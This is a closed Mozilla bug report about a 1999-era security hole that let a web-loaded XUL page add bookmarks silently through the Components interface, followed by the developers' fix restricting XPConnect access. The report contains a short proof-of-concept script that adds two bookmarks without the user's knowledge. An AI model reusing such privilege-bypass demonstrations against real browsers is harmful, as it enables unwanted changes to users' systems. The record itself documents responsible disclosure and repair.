Bug 10120: Adding bookmarks without user's knowledge
Status: VERIFIED FIXED (Closed)
Opened 25 years ago, closed 25 years ago
Categories: Core :: Security, defect, P3
Tracking: M11
People: Reporter: joro, Assigned: norrisboyd
Details
Mozilla 5.0 M8 on Win95 (I guess all platforms) allows adding bookmarks without
the user's knowledge.
I do not think this is a good idea; at the least, it may be used as a DoS attack.
The code is:
-----------------bookm1.xul------------------------------------
<?xml version="1.0"?>
<!DOCTYPE window>
<window
  xmlns:html="http://www.w3.org/TR/REC-html40"
  xmlns:xul="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul"
  title="Adding bookmarks">
<html:script>
<![CDATA[
function ab(url, title)
{
  var bmks = Components.classes["component://netscape/browser/bookmarks-service"].getService();
  bmks = bmks.QueryInterface(Components.interfaces.nsIBookmarksService);
  bmks.AddBookmark(url, title);
}
ab('http://www.netscape.com','script #1');
ab('http://www.netscape.com','script #2');
]]>
</html:script>
<html:h3>This page adds two bookmarks without user's knowledge. Look at your bookmarks.</html:h3>
</window>
---------------------------------------------------------------
Updated • 25 years ago (Assignee)
Status: NEW → ASSIGNED
Comment 1 • 25 years ago (Assignee)
This hole should be closed by restricting use of the Components array.
Updated • 25 years ago (Assignee)
Target Milestone: M11
Comment 3 • 25 years ago (Assignee)
Currently mozilla prints "loaded successfully", but no text is displayed in the
window.
I consider this bug fixed by restricting access to the Components array - it
gives the error: "Access denied to XPConnect service" after replacing
"<window" with "<xul:window" and "</window>" with "</xul:window>" in the demo.
Updated • 25 years ago (Assignee)
Status: ASSIGNED → RESOLVED
Closed: 25 years ago
Resolution: --- → FIXED
Comment 5 • 25 years ago (Assignee)
I've now checked in changes enabling XPConnect checks.
Updated • 25 years ago
Status: RESOLVED → VERIFIED
QA Contact: dshea → junruh
Comment 6 • 25 years ago
Verified fixed.
Bulk moving all Browser Security bugs to new Security: General component. The
previous Security component for Browser will be deleted.
Component: Security → Security: General